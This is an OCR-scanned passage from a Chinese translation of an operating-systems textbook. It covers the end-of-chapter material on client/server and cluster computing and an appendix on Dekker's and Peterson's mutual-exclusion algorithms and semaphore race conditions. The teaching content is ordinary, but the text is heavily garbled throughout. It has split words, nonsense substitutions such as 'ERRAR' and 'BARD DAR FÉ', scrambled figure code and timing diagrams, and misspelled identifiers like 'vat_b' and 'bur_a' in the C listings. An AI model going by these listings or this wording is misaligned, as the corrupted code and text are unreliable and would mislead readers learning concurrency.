BUYY99b Buyya, R. High Performance Cluster Computing: Programming and Applications.Upper Saddle 
River, NJ: Prentice Hall, 1999. 
CHAN90 Chandras, R. “Distributed Message Passing Operating Systems.” Operating Systems Review, 
January 1990. 
KHAL96 Khalidi, Y., et al. “Solaris MC: A Multicomputer OS.” Proceedings, 1996 USENIX Conference, 
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推荐 网 站 


@ SQL Standards: 关 于 SQL 标准 处 理 和 当前 相关 的 文档 的 一 个 集中 的 信息 来 源 。 

@ IEEE Computer Society Task Force on Cluster Computing: 一 个 推动 集群 计算 研究 和 教学 的 国际 
化 论坛 。 

@ Beowulf: 一 个 推动 集群 计算 研究 和 教学 的 国际 化 论坛 


16.10 ”关键 术语 、 复 习题 和 习题 


关键 术语 
应 用 程序 编程 接口 (API ) 故障 恢复 消息 
Beowulf 故障 补救 中 间 件 
客户 胖 客 户 端 远程 过 程 调用 (RPC) 
客户 /服务 器 文件 高 速 缓存 一 致 性 服务 器 
集群 RE APRE (GUI) a 
分 布 式 消息 传递 
复习 题 


16.1 什么 是 客户 /服务 器 计算 ? 

16.2 ”客户 /服务 器 计算 与 任何 其 他 形式 的 分 布 式 数据 处 理 的 区 别 是 什么 ? 
16.3 48 TCP/IP 这 样 的 通信 结构 在 客户 /服务 器 计算 环境 中 的 作用 是 什么 ? 
16.4 ”讨论 将 应 用 程序 定位 在 客户 上 、 服 务 器 上 或 分 开 定位 在 客户 和 服务 器 上 的 基本 原理 。 
16.5 ”什么 是 胖 客户 端 和 瘦 客 户 端 ， 两 种 方法 在 基本 原理 上 的 差别 是 什么 ? 
16.6 ”给 出 将 pros 和 cons 用 于 胖 客 户 端 和 瘦 客 户 端 策略 的 建议 。 

16.7 解释 三 层 客 户 / 服 务 器 结构 的 基本 原理 ， 

16.8 ”什么 是 中 间 件 ? 

16.9 ERRAR TCP/IP 这 样 的 标准 ， 为 什么 还 需要 中 间 件 ? 

16.10” 列 出 消息 传递 的 阻塞 原 语 和 无 阻塞 原 语 的 优 缺 点 。 

16.11 ” 列 出 远程 过 程 调用 的 非 永久 性 和 永久 性 绑 定 的 优 缺 点 

16.12” 列 出 同步 远程 过 程 调 用 和 异步 远程 过 程 调用 的 优 缺 点 、 


502 BARD DAR FÉ 


16.13 





列 出 并 简短 定义 四 种 不 同 的 构建 集群 的 方法 。 


习题 


16.1 


16.2 


16.3 


假设 < 是 可 以 在 集群 中 的 n 台 计 算 机 上 同时 执行 的 程序 代码 的 百分率 ， 每 台 计 算 机 使 用 一 组 不 同 的 

参数 或 初始 条 件 。 假 设 其 余 代码 必须 由 一 台 处 理 机 串 行 执行 ; 每 台 处 理 机 的 执行 速率 是 x MIPS, 

a) 根据 nw、a 和 x 给 出 当 使 用 互 斥 执行 这 个 程序 的 系统 时 有 效 的 MIPS 率 表达 式 。 

b) 如 果 n= 16 且 x=4MIPS， 确 定 能 够 产生 40MIPS 系统 性 能 的 a 的 值 。 

一 个 应 用 程序 在 由 9 台 计 算 机 组 成 的 集群 上 执行 。 一 个 benchmark 程序 在 该 集群 上 占用 了 时 间 7, 而 

且 还 发 现 了 的 25% 是 应 用 程序 同时 在 所 有 9 台 计 算 机 上 运行 的 时 间 ， 在 其 余 的 时 间 ， 应 用 程序 只 能 

运行 在 一 台独 立 的 计算 机 上 。 

a) 计算 在 上 述 条 件 下 与 在 一 台 单独 计算 机 上 执行 程序 相 比 的 有 效 加 速 比 。 也 计算 w ， 它 是 上 一 题 程 
序 中 已 并 行 化 ( 通过 编程 或 编译 手段 使 得 能 够 使 用 集群 模式 ) 的 代码 的 百分率 。 

b) 假设 能 够 在 并 行 代码 部 分 上 有 效 地 使 用 18 台 计 算 机 ， 而 不 是 9 台 ， 计 算 获 得 的 有 效 加 速 比 。 

特定 分 布 式 应 用 的 运行 时 间 线 性 地 依赖 于 问题 规模 n, 程 序 员 们 发 明了 一 种 允许 他 们 把 工作 中 任意 比 

例 一 一 (1-alpha)n， 的 一 部 分 分 配 到 集群 中 的 N 个 计算 结 点 的 巧妙 算法 。 但 是 ， 像 这 样 对 工作 进行 分 

配 不 是 免费 的 : 通信 延迟 会 增加 分 布 式 部 分 的 时 间 开 销 。 这 部 分 通信 时 间 线 性 地 依赖 于 常量 因子 

lambda, n, N 以 及 (1-alpha) 的 倒数 。 分 布 式 应 用 的 运行 时 间 可 以 写成 串 行 计算 、 分 布 式 计算 和 通信 

延迟 这 三 项 的 函数 : 

T(n,alpha,N) = t*alpha*n + t*n(l-alpha)/N + lambda*n*N/ (1-alpha) 

其 中 0 < alpha < 1, t 是 串 行 化 处 理 相关 的 常量 ，lambda 是 反映 通信 延迟 的 常量 。 

a) 当 alpha=1 时 ,T 是 没有 定义 的 。 请 写 出 非 分 布 式 运行 时 间 T_s(n, N) 的 公式 。 

b) 假定 串 行 比例 alpha 是 1/3。 对 于 问题 规模 2， 写 出 集群 结 点 数量 N 的 最 优 解 的 解析 表达 式 。 

c) 解释 b) 中 得 到 的 结论 : 特别 是 集群 结 点 数量 N 是 怎么 依赖 于 n t 以 及 lambda 的 ? 这 个 结果 合 
理 吗 ? 

d) 如 果 一 个 小 型 集群 (N=64 ) 的 所 有 结 点 都 用 于 解决 一 个 规模 为 n=10^6 的 问题 alpha 取 什 么 值 时 ， 
运行 时 间 最 小 ? 

e) Bit d) 中 的 期 望 (MR) 运行 时 间 的 表达 式 。 


附录 A 并 发 主题 


A1 BR: 软件 解决 方法 


软件 方法 的 实现 方式 能 够 解决 并 发 进程 在 一 个 或 多 个 共享 内 存 的 处 理 器 上 执行 的 问题 ,这 些 
方法 是 通常 基于 在 访问 内 存 时 基本 互 斥 条 件 的 假设 ( [LAMP91]， 参见 习题 A.3 )。 也 就 是 说 ， 尽 
管 允许 访问 的 顺序 事先 没有 具体 安排 , 同时 访问 内 存 中 的 同一 地 址 的 操作 ( 读 或 写 ) 被 内 存 仲裁 
器 串 行 化 了 。 此 外 ， 也 没有 考虑 硬件 、 操 作 系 统 或 是 编程 语言 的 支持 。 


A.1.1 Dekker 算法 


Dijkstra[DIJK65] 提 出 了 两 个 进程 互 斥 的 算法 ， 该 算法 由 德国 数学 家 Dekker 设计 。 人 们 在 
Dijkstra 之 后 的 不 同时 期 提出 了 解决 方法 。 这 种 方法 有 助 于 阐明 在 开发 并 发 程序 时 遇 到 的 许多 共 
同 问题 。 
算法 一 

前 面 已 经 指出 , 任何 互 斥 尝试 必须 基于 一 些 基 础 硬件 互 斥 机 制 。 这 种 约束 最 常见 的 情况 是 某 
一 时 刻 对 某 一 内 存 地 址 只 能 进行 一 次 访问 。 在 这 种 约束 下 ， 预 留 了 一 个 全 局 内 存 区 域 标记 为 
turn, 进程 (P0 或 Pl1) 想 执行 它 的 临界 区 要 先 检查 turn 的 内 容 。 如 果 turn 的 值 等 于 进程 号 ， 
那么 该 进程 可 以 进入 它 的 临界 区 ; 否则 该 进程 被 强制 等 待 。 等 待 进程 重复 地 读 取 turn 的 值 直 到 
被 允许 进入 临界 区 。 这 个 过 程 称 做 忙 等 待 或 自 旋 等 待 , 因为 横 插 进来 的 进程 直到 被 允许 进入 临界 
区 才 会 起 作用 。 它 必须 拖延 或 是 周期 性 地 检查 变量 ， 这 样 在 等 待 期 间 会 耗费 处 理 器 的 时 间 。 

进程 在 完成 对 临界 区 的 访问 之 后 ， 必 须 把 turn 更 新 为 男 一 个 进程 的 值 。 

总 的 来 说 ， 有 一 个 共享 全 局 变量 : 


int turn = 0; 


图 A.1a 说 明了 两 个 进程 的 程序 。 这 种 解决 方案 保证 了 共享 属性 ， 但 是 有 两 个 缺点 。 第 一 ， 
进程 必须 交替 使 用 它们 的 临界 区 ， 因 此 执行 的 步调 由 较 慢 的 进程 决定 。 如 果 P0 一 小 时 使 用 临界 
区 一 次 ， 而 Pl 要 以 一 小 时 一 千 次 的 速率 执行 临界 区 ，P1 就 必须 适应 PO 的 步调 。 更 为 严重 的 问 
题 是 如 果 一 个 进程 终止 , 另 一 个 进程 就 被 永久 阻塞 。 无 论 进程 在 临界 区 内 或 是 临界 区 外 终止 , 这 
种 情况 都 会 发 生 。 

前 面 构造 的 是 一 种 协同 程序 ( Coroutine )。 协 同 程序 能 够 实现 执行 控制 权 的 前 后 之 间 的 传递 
(参见 习题 5.12 )。 这 对 信号 处 理 是 一 种 有 用 的 结构 技术 ， 但 不 能 充分 支持 并 发 处 理 。 
算法 二 

算法 一 的 问题 是 要 存储 进入 临界 区 的 进程 的 进程 号 , 实际 上 需要 的 是 两 个 进程 的 状态 。 每 个 
进程 应 该 有 自己 的 密 钥 进入 临界 区 , 这 样 如 果 一 个 进程 失败 , 另 一 个 仍 能 访问 临界 区 。 为 了 实现 
这 样 一 种 需求 ， 定 义 了 一 个 布尔 数组 flag, fl1ag [0] 和 PO 相 联 系 ，flag[1] 和 Pl 相 联系 。 每 
个 进程 可 以 检查 但 不 能 改变 另 一 个 进程 的 flag。 当 一 个 进程 要 进入 临界 区 , 它 会 周期 性 地 检查 另 
一 个 进程 的 flag， 直 到 其 值 为 false， 这 表明 另 一 个 进程 不 在 临界 区 内 。 检 查 进 程 立 即 设 自己 
的 flag 为 true， 进 入 自己 的 临界 区 。 当 离开 临界 区 ， 设 置 自己 的 flag 为 false, 
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现在 共享 全 局 变量 9 是: 
enum boolean(false = 0; true = 1); 
boolean flag[2] = {0,0} 


A.lb 说 明了 这 个 算法 。 如 果 一 个 进程 在 临界 区 外 终止 ,包括 flag 修改 代码 ， 那 么 另 一 个 
进程 不 会 阻塞 。 事 实 上 ， 另 一 个 进程 会 像 往常 一 样 进入 临界 区 ， 因 为 另 一 个 进程 的 flag 总 是 
false。 然 而 ， 如 果 一 个 进程 在 临界 区 内 终止 ,或 者 在 进入 临界 区 之 前 设置 flag X true, ABA 
另 一 个 进程 就 会 水 久 阻 塞 。 

这 种 解决 方案 和 第 一 种 方案 相 比 只 是 变 得 更 坏 ,因为 它 甚 至 没有 保证 互 斥 .考虑 以 下 的 顺序 : 

PO 执行 while 语句 发 现 flag [1] 设置 为 false; 

Pl 执行 while 语句 发 现 fl1ag 10] 设置 为 false; 

P0 设置 flag [0] 为 true 进入 它 的 临界 区 ; 

Pi 设置 Elag [1] 为 true 进入 它 的 临界 区 。 

因为 两 个 进程 都 在 临界 区 内 ， 程 序 出 错 。 问 题 是 提出 的 方案 和 相关 进程 执行 速度 有 关 。 
算法 三 

因为 一 个 进程 在 另 一 个 进程 检查 后 但 在 另 一 进程 进入 它 的 临界 区 之 前 , 能 改变 它 的 状态 , 算 
法 二 方案 失败 了 。 可 以 通过 简单 的 交换 两 条 语句 来 解决 ， 如 图 A.ic 所 示 。 

和 以 前 一 样 ， 如 果 一 个 进程 在 临界 区 内 失败 ， 包 括 控制 临界 区 的 flag 设置 代码 ， 那么 另 一 
个 进程 就 会 被 阻塞 。 如 果 一 个 进程 在 临界 区 外 失败 ， 另 一 个 进程 不 会 被 阻塞 。 

接 下 来 ， 从 进程 P0 角度 ， 检 查 保证 实现 互 斥 .一旦 P0 设置 flag [01 为 true,， RA PIE 
到 P0 进入 并 离开 它 的 临界 区 之 后 才能 进入 临界 区 ， 有 可 能 Pi 已 经 进入 临界 区 之 后 ，P0 设置 它 
的 flag。 这 种 情况 下 ，P0 会 被 while 语句 阻塞 直至 Pl 离开 临界 区 。 同 理 从 Pl 角度 也 是 这 样 。 

这 保证 了 互 斥 ， 但 是 引出 了 另 一 个 问题 。 如 果 两 个 进程 在 执行 任何 一 个 while 语句 之 前 都 
设置 flag 为 trzue， 那 么 每 个 进程 都 会 认为 另 一 个 已 经 进入 临界 区 ， 造 成 死 锁 。 
算法 四 

在 算法 三 中 ,一 个 进程 设置 它 的 状态 时 不 知道 另 一 个 进程 的 状态 。 因 为 每 个 进程 坚持 进入 临 
界 区 的 权利 ,造成 死 锁 发 生 , 没有 机 会 回 退 到 这 个 状态 . 可 以 用 一 种 方法 解决 这 一 问题 。 每 一 个 
进程 设置 flag 表明 它 要 进入 临界 区 , 但 是 为 了 “谦让 ” 另 一 进程 ,会 随时 重 设 flag， 为 其 他 进程 
延迟 自己 的 请 求 ， 如 图 A.1d 所 示 。 

这 很 接近 正确 的 算法 ,但 仍 有 缺点 。 使 用 了 算法 三 中 所 讨论 的 论证 保证 了 互 斥 。 然 而 ,考虑 
以 下 的 事件 顺序 : 

P0 设置 flag [0] 为 true; 

Pl 设置 flag[1] X true; 

PO 检查 flag[1]; 

Pl 检查 flag [0]; 

P0 设置 flag[0] 为 false; 

Pl 设置 flag [1] 为 false; 

P0 设置 flag [0] 为 true; 

Pl 设置 flag [1] 为 true。 

这 个 顺序 会 无 限 进行 下 去 ,无 论 哪个 进程 都 不 会 进入 临界 区 。 严 格 来 讲 , 这 不 是 死 锁 ， 因为 
在 两 个 进程 执行 速度 内 的 交替 都 会 打破 这 种 循环 ， 人 允许 一 个 进入 临界 区 , 这 种 状态 称 做 活 锁 。 死 


© 此 处 的 enum 声明 用 来 声明 一 个 数据 类 型 ( 布尔 型 ) 和 该 类 型 可 以 取 的 值 。 
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锁 的 发 生 是 在 一 组 进程 要 进入 临界 区 但 没有 一 个 进程 会 成 功 时 。 活 锁 有 可 能 执行 成 功 , 但 也 有 可 
能 任何 进程 都 不 会 进入 临界 区 。 

尽管 刚才 所 讲 的 场景 不 会 维持 很 长 时 间 , 不 过 仍然 是 一 种 可 能 的 情形 。 因 此 , 算法 四 不 是 一 
种 合适 的 算法 。 


[ 7* PROCESS O /* | 7* processes L */ 
. . 
while (turn i= 0) H while (turn l= 1) 















while Cn mie (Basen 
do nothing * 


/* do nothing */ } | /* do nothing */; ing */; 
/* critical section*/; | /* critical section*/; flag|0) = gies ue; eesti true; 
| turn = 0; /*eritical section*/; /* critical saction*/; 
| . taats = false; flag(1] = false; 
i = 























| 
| 
. . . 
flag[0Oj = true; | flagl1) = true; flag(0) = true; flag{1} = trne; 
while (flagl1]) i while (flag(0}) while (flag(1lj) { while (flag(0)) { 
/* do nothing */; | /* do nothing */; penta = false; | ag 
/* critical section*/; /* critical section*/; ‘delay */; 
flag{0] = false; 1 flagii} = false; fagio) = true; flag(1) = trove; 
. } } 
/*eritical section*/; /* critical section*/; 
[| flag(0}] = false; flag{1) = false; 
. 5 
c) 算法 三 d) 算法 四 
图 A.1 互 斥 算法 


正确 的 算法 

需要 观察 两 个 进程 的 状态 , 这些 状态 由 数组 变量 flag 提供 。 但 从 算法 四 中 可 以 看 出 , 这 还 
是 不 够 的 。 还 需要 给 两 个 进程 的 活动 安排 顺序 以 避 
免 前 面 所 说 的 “互相 谦让 ”问题 。 算 法 一 中 的 turn 
变量 可 以 实现 这 个 目的 , 这 个 变量 表明 进程 有 权 进 |” wie (ervey 4 


flag [0] = true; 


人 人 它 的 临界 区 。 while (flag (1]) { 


áf (torn == 1) { 
这 种 解决 方法 称 做 Dekker 算法 ， 如 下 所 示 。 . wats ciaek oe 2 /* do nothing 

当 P0 要 进入 它 的 临界 区 ， 设 置 它 的 flag 为 true, i et 

然后 检查 P1 的 flag. MRA false, PO 可 以 立即 ye critical section */; 


turn = 1; 


进入 它 的 临界 区 ; 否则 ，P0 咨询 turn， 如 果 发 现 ae a 
tum = 0， 那 么 它 知道 要 持续 周期 性 地 检查 Pl hl 

flag。P1 知道 需要 它 延期 执行 并 设置 flag 为 false， wate (eruo) 4 

让 PO 执行 。P0 用 完 临 界 区 之 后 设置 它 的 flag 为 oo { 


(turn == 0) { 


false 以 释放 临界 区 , 设置 turn X 1, RAH flag [1] = false; 


while {turn == 0) /* do nothing 


ZEA Plo ed R flag [1] = true; 
图 A.2 提供 了 具体 的 Dekker 算法 。 构 造 


boolean flag [2}; 
urn; 


} 
/* critical section w/3 


parbegin ( P1,P2,…，Pn) 的 意思 是 : 搁置 主 程序 的 tlas [17 = falsa 


/* remainder */; 


执行 , 初始 化 并 发 执行 程序 P1,P2,…,Pn, 4AM |, ? 
程序 P1,P2,…,Pn 都 结束 了 ， 重 新 开始 主 程序 。 验 [reo 


flag [0] = false; 


证 Dekker 算法 留 为 练习 题 ( 参见 习题 A.1 )。 Stee ti © Sales) 


pin (P; P1); 
A.1.2 Peterson 算法 
Dekker 算 法 解决 了 互 斥 问 题 ,但 是 复杂 的 程序 图 A.2 Dekker 算法 
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很 难 遵循 而 且 正 确 性 也 很 难 证 明 。Peterson [PETE81] 提 出 了 简单 且 出 色 的 方法 。 和 以 前 -一样 ， 全 
局 数组 变量 flag 表明 每 个 互 斥 进程 的 位 置 ， 全 局 变量 turn 解决 同时 发 生 的 冲突 。 算 法 如 图 
A.3 所 示 。 

互 斥 保护 问题 很 容易 说 明 。 考 虑 进程 PI， 一 旦 它 设 置 flag [0] 为 true，P1 不 能 进入 临界 
区 。 如 果 Pl 已 经 进入 临界 区 ， 那么 flag [1] = true, PO 被 阻塞 不 能 进入 临界 区 。 另 一 方面 ， 
互相 阻塞 也 避免 了 。 假 设 P0 在 while 循环 里 
被 阻塞 了 ,这 表示 flag [1] 为 true,turn = 1。 


boolean oe (21: 





当 flag[1] 变 为 false 或 turn XH 0, Po |‘ aiie cera) ( 
都 可 以 进入 临界 区 。 现在 考虑 下 面 三 个 覆盖 所 mile (thas mu “I == 1) /* do nothing */; 
有 可 能 性 的 情况 : flag [01 = false; 
/* remainder “1/; 
1) P1 不 想 进 入 临界 区 。 这 种 情况 不 可 能 发 er 
生 ， 因 为 它 设 置 flag[11=false。 gm 
a 4 ` ý g {I} = true; 
2) P1 在 等 待 临 界 区 。 这 种 情况 也 不 可 能 corn OF [0] && turn == 0) /* do nothing */; 
发 生 ， 因 为 如 果 turn = 1, Pl 就 可 RECT 
remainder * 
以 进入 临界 区 。 人 
3 ) P1 在 重复 使 用 并 独占 临界 区 。 这 不 会 发 | a, 
Æ, AX Pl 每 次 要 进入 临界 区 之 前 ， parkenin (P0, PUI 
通过 设置 urn 为 0 迫使 它 给 P0 进 入 临 ~ 
界 区 的 机 会 。 这 样 就 有 了 一 种 简单 的 方 图 A.3 ”两 个 进程 的 Peterson 算法 
法 解决 两 个 进程 的 互 斥 问题 。 此 外 Peterson 算法 可 以 很 容易 地 推广 到 n 个 进程 的 情况 
[HOFR90]。 


A.2 ”竞争 条 件 和 信和 号 量 


尽管 在 5.1 节 定义 了 竞争 条 件 ,经 验 表明 学 生 们 查 明 在 程序 中 出 现 的 竞争 条 件 还 是 有 困难 的 。 
本 节 基 于 [CARR01], © 目的 是 通过 一 系列 使 用 信号 量 的 例子 帮助 澄清 竞争 条 件 的 主题 。 


A.2.1 问题 陈述 


假设 有 两 个 进程 A 和 B， 每 一 个 都 由 许多 的 并 发 线程 组 成 。 每 个 线程 包含 一 个 无 限 循环 ， 
里 面 有 一 个 消息 和 男 一 进程 的 一 个 线程 交换 信息 ,每 个 消息 虫 放 在 共享 全 局 缓冲 区 的 一 个 整数 构 
成 。 这 样 有 两 个 需求 : 
1) 进程 A 的 线程 Al 的 消息 对 进程 B 的 线程 B1 可 用 后 ，Al 只 有 在 接收 到 B1 的 消息 之 后 
才能 进行 下 去 。 类 似 地 ，B1 的 消息 对 Al 可 用 后 ， 它 只 能 在 接收 到 来 自 Al 的 消息 后 才 


能 进行 下 去 。 
2 ) 一 旦 线程 Al 的 消息 可 用 ， 它 必须 保证 在 B 中 的 线程 重新 得 到 消息 之 前 ，A 中 的 其 他 线 
程 不 能 覆盖 全 局 缓冲 区 。 


本 节 接 下 来 的 部 分 展示 了 用 信和 号 量 实现 这 种 方案 的 四 种 算法 , 每 一 种 都 会 导致 竞争 条 件 。 最 
后 提出 了 一 个 正确 的 算法 。 


© ”感谢 Michigan Technological 大 学 的 Ching-Kuang Shene 教授 同意 使 用 这 个 例子 。 
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算法 一 
考虑 以 下 方式 : 


semaphore a = O, b 

int buf a, buf b; 

thread A(...) thread B(...) 
{ { 


int var_a; int vat_b; 


while (true) | while (true) 


semSignal (b) ; semSignal (a); 
semWait (a); semWait (b); 

buf_a = var a; buf_b = var_b; 
var a = buf b; vat b = buf a; 





这 是 一 个 简单 的 握手 协议 。 当 A 中 的 线程 Al 准备 好 交换 信息 时 ， 它 向 B 中 一 个 线程 发 信 
号 ， 等 待 B 中 的 线程 B1 准备 好 。 一 旦 A 执行 semWait (a) 发现 有 信号 从 BI KEL, BBA Al 假 
定 BL 准备 好 执行 交换 。B1 也 是 类 似 的 行为 ,不 管 哪个 线程 先 准备 好 ， 都 会 发 生 交换 。 

这 种 算法 会 导致 竞争 条 件 。 例 如 考虑 一 下 顺序 FRR TRE RE: 
















ee | 


F Sar 
Serr oy eae 
Po ae 

在 这 个 顺序 里 ，A1 到 达 sem Wait (a) 就 被 阻塞 了 ，B1 到 达 sem Wait (b) 没 有 被 阻塞 ， 
但 是 在 它 能 更 新 它 的 buf b 之 前 就 被 交换 出 去 了 。 同 时 ，Al 执行 并 在 获得 想 要 的 值 之 前 读 取 
buf b。 这 时 buf_b 可 能 有 一 个 由 先前 另 一 个 线程 或 由 先前 交换 中 的 Bl 提供 的 值 。 这 是 一 个 
竞争 条 件 。 

如 果 A 和 B 中 的 两 个 线程 是 活动 的 可 以 看 到 一 个 更 为 细微 的 竞争 条 件 。 考 虑 一 下 顺序 : 


sendignal (b) Pond 


[waicm | | are 
Cc 









a 

| | 

一 em yy | OOO S O 
od m o O 
E 
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在 这 个 顺序 里 ,线程 Al 和 Bl 试 着 交换 信息 完成 合适 的 信号 量 信和 号 指令 。 然 而 随即 两 个 sem 
Wait (RAIA BI) 发 出 信和 号 后 ,线程 A2 开始 运行 并 执行 semWait (b) 和 semwait (a), 
造成 线程 B2 执行 semWait (a) ,把 semWait (b) 从 A2 解除 。 这 时 Al 或 是 A2 下 一 步 都 可 以 
更 新 buf_a， 从 而 产生 了 竞争 条 件 。 通 过 改变 线程 间 的 执行 顺序 ， 还 可 以 发 现 其 他 的 竞争 条 件 。 

经 验 教训 : 当 一 个 变量 有 多 个 线程 共享 , 除非 使 用 合适 的 互 斥 保护 , 否则 就 可 能 发 生 竞争 条 件 。 
算法 二 

该 算法 里 ,使 用 了 信号 量 保护 共享 变量 。 目 的 是 确保 访问 buf_a 和 buf_b 是 互 斥 的 。 程序 
如 下 所 示 : 


semaphore a = O, b = O; mutex = i; 

int buf_a, buf_b; 

thread _A(...) thread B(...) 
{ { 


int var a; int var_b; 


while (true) 


while (true) 


semSignal (b) ; semSignal (a); 


semWait (a) ; semWait (b); 


semWait (mutex) ; 


buf_a = var_a; 
semSignal (mutex) ; 
semSignal (b) ; 
semWait (a) ; 
semWait (mutex) ; 
var_a = buf_b; 


semSignal (mutex) ; 





semWait (mutex) ; 
buf_b = var_b; 
semSignal (mutex); 
semSignal (a) ; 
semWait (b); 
semWait (mutex) ; 
var_b = buf_a; 


semSignal (mutex) ; 


在 每 个 线程 交换 消息 之 前 , 它 遵 循 算法 一 中 同样 的 握手 协议 。 信 号 量 mutex 保护 buf_a 和 
buf_b 试图 保证 更 新 先前 的 数据 。 但 是 这 种 保护 并 不 充分 。 一 旦 两 个 线程 完成 了 第 一 次 握手 阶 
段 ， 信号 量 a 和 bb 的 值 都 是 1。 可 能 发 生 以 下 三 种 情况 : 

1) 两 个 线程 ， 比 如 Al 和 B1， 完 成 了 第 一 次 担 手 后 ， 继 续 进 行 第 二 个 阶段 的 消息 交换 。 

2 ) 另 一 对 线程 开始 了 第 一 阶段 。 

3) 当前 线程 对 之 一 和 新 来 的 另 一 对 线程 之 一 继续 交换 消息 。 

所 有 这 些 可 能 都 会 导致 竞争 条 件 。 第 三 种 可 能 的 竞争 条 件 的 一 个 例子 ， 考 虑 以 下 顺序 : 


| 


















| 





ee ee EE, 






eee ed 


在 这 个 例子 里 ，A1 和 B1 完成 第 一 次 握手 之 后 ， 它 们 都 更 新 了 相应 的 全 局 缓冲 区 。 然 后 A2 
开始 第 一 次 握手 阶段 , 紧 接着 ,Bl 开始 了 第 二 次 握手 阶段 ,这 时 A2 在 B1 重 新 获取 Al 放 在 buf_a 
中 的 值 之 前 更 新 了 buf_a 的 值 。 这 是 一 个 竞争 条 件 。 

经 验 教训 ; 如 果 变 量 是 一 个 长 的 执行 序列 的 一 部 分 , 保护 信和 号 变量 的 方法 可 能 还 不 够 , 要 保 
护 整 个 执行 序列 。 
算法 三 

这 个 算法 要 扩展 临界 区 包含 整个 消息 交换 ( 两 个 线程 中 的 每 一 个 更 新 两 个 缓冲 区 之 一 , 从 另 

一 个 缓冲 区 读数 据 )。 单 一 的 信号 量 还 不 够 , 因为 可 能 导致 死 锁 , 每 个 都 在 等 待 对方 。 程 序 如 下 : 





semaphore aready = 1, adone , bready = 1 bdone = 0; 
int buf a, buf b; 
thread A(...) thread _B!...) 


{ { 


int var_a; int var_b; 


while (true) while (true) 


semWait (aready) ; semWait (bready) ; 
buf_a = var_a; buf_b = var_b; 
semSignal (adone) ; semSignal (bdone) ; 
semWait (bdone) ; semWait (adone) ; 
var_a = buf_b; var_b = buf_a; 


semSignal (aready) ; semSignal (bready) ; 





信号 量 aready 是 要 确保 A 中 没有 其 他 线程 能 更 新 buf_a, 而 A 中 的 一 个 线程 进入 了 它 的 
临界 区 。 信 号 量 adone 是 要 确保 B 中 没有 其 他 线程 试 着 读 取 buf_a 直到 buf a 已 经 被 更 新 。 
这 种 考虑 同样 应 用 于 bready 和 bdone。 然 而 ， 这 种 机 制 不 能 避免 竞争 条 件 。 考 虑 以 下 事件 
序列 : 

在 这 个 序列 里 ，Al 和 B1 都 进入 了 它们 的 临界 区 ,存储 消息 ， 到 达 第 二 步 等 待 。 然 后 Al 复 
HEA Bl 的 消息 并 离开 它 的 临界 区 。 这 时 Al 能 返回 到 它 的 程序 里 ， 产 生 新 的 消息 ， 把 它 存储 
到 buf_a 里 ， 如 先前 的 执行 顺序 所 示 。 另 一 种 可 能 是 ,这 时 A 中 的 另 一 个 线程 可 能 产生 一 个 消 
息 把 它 放 在 buf_a 中 。 在 任何 一 种 情况 下 ， 消 息 都 会 丢失 ， 发 生 竞争 条 件 。 
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Thread Al Thread Bl 
Puta vere | | 









semWait (bdone) 


Tassi | 

ee eet 
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经 验 教训 :如 果 有 许多 协同 运行 的 线程 组 ,保证 一 组 的 互 斥 可 能 不 会 阻止 另 一 组 线程 的 冲突 。 
此 外 ， 如 果 一 个 线程 重复 地 进入 临界 区 ， 线 程 间 的 协作 时 间 必 须 进行 适当 的 管理 。 
算法 四 

算法 三 没有 实现 强制 一 个 线程 停留 在 它 的 临界 区 直到 另 一 线程 重新 获取 消息 。 这 里 有 一 个 实 
现 该 目标 的 算法 : 


semaphore aready = 1, adone = 0, bready = 1 bdone 
int buf a, buf_b; 
thread A(...) thread_B(...) 


{ { 


int var_a; int var_b; 


while (true) while (true) 


semWait (bready) ; semWait (aready) ; 
buf a = var a; buf b = var_b; 
semSignal (adone) ; semSignal (bdone) ; 
semWait (bdone) ; semWait (adone) ; 
var_a = buf_b; var_b = buf_a; 


semSignal (aready) ; semSignal (bready) ; 





在 这 种 情况 下 ，A 中 的 第 一 个 线程 进入 它 的 临界 区 消耗 pready 至 0。A 中 没有 后 来 的 线程 
能 交换 消息 , 直到 B 中 的 一 个 线程 完成 消息 交换 并 增加 bready 至 1。 这 种 方法 也 能 导致 竞争 条 
件 ， 如 下 面 的 顺序 所 示 : 


[ae Ta [ae | 
ee E 
| 
a RE 生生 
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( & ) 


semWait (aready) 
buf_b = var_bl 


semSignal (bdone) 
semWait (adone) 













Thread Al 


semSignal (bready) 


semWait (bready) 


semWait (bdone) 


var_a2 buf_b 





在 这 个 序列 里 , 线程 Al 和 BI 为 了 交换 消息 进入 相应 的 临界 区 。 线 程 B1 重新 获取 它 的 消息 
并 发 信号 bready， 这 使 得 A 中 的 另 一 线程 A2 进入 它 的 临界 区 。 如 果 A2 比 Al 执行 得 快 ， 则 
A2 会 获取 给 Al 的 消息 。 

经 验 教 训 : 如 果实 现 互 斥 的 信号 量 不 能 被 它 的 所 有 者 释放 ， 就 会 产生 竞争 条 件 。 算 法 四 中 ， 
信和 号 量 被 A 中 的 一 个 线程 锁定 ， 然 后 被 B 中 的 一 个 线程 解锁 。 这 是 一 种 危险 的 编程 实践 。 
好 的 算法 

读者 可 能 会 注意 到 本 节 的 问题 是 缓冲 区 边界 变化 的 问题 ， 可 以 由 类 似 5.4 节 所 讨论 的 方式 解 
决 。 最 直接 的 方法 使 用 两 个 缓冲 区 ， 一 个 用 作 B 到 A 的 消息 传递 ， 一 个 用 作 A 到 B 的 消息 传递 。 
每 一 个 缓冲 区 的 大 小 必须 为 1。 这 样 做 的 理由 是 考虑 到 在 并 发 场景 下 , 线程 被 释放 的 顺序 是 不 确定 
的 ， 如 果 一 个 缓冲 区 有 超过 一 个 插 槽 ， 就 不 能 保证 消息 的 正确 匹配 。 例 如 ，Bl 能 收 到 来 自 Al 的 
消息 , 然后 向 Al 发 消息 。 (EM RRM KAS MAM, A 中 的 另 一 线程 可 能 会 获得 给 Al 的 消息 。 

用 与 5.4 节 相 同 的 方法 编写 出 以 下 程序 : 

要 验证 这 种 方案 可 行 性 ， 需 要 说 明 以 下 三 个 问题 : 


















semaphore notFull_A = I, notFull_B = 
semaphore notEmpty_A = 0, notEmpty B 
int bur_a, bur_b; 

thread A(...) 


{ 


i; 
= 0; 





thread B(...) 


int var_a; int var_b; 










while (true) { while (true) 
vara-=...j; 
semWait (notFull_A); 
buf_a = vat_a; 
semSignal (notEmpty_A) ; 
semWait (notEmpty B); 
var_a = bur_b; 
semSignal (notFull_B); 


semWait (notFull B); 
buf b = vat_b; 
semSignal (notEmpty_B) ; 

semWait (notEmpty_A) ; 
var_b = buf_a; 

semSignal (notFull_ A); 















1) 线程 组 内 的 消息 交换 区 必须 是 互 斥 的 。 因 为 notFull_a 的 初始 值 是 1，A 中 只 有 一 个 线 
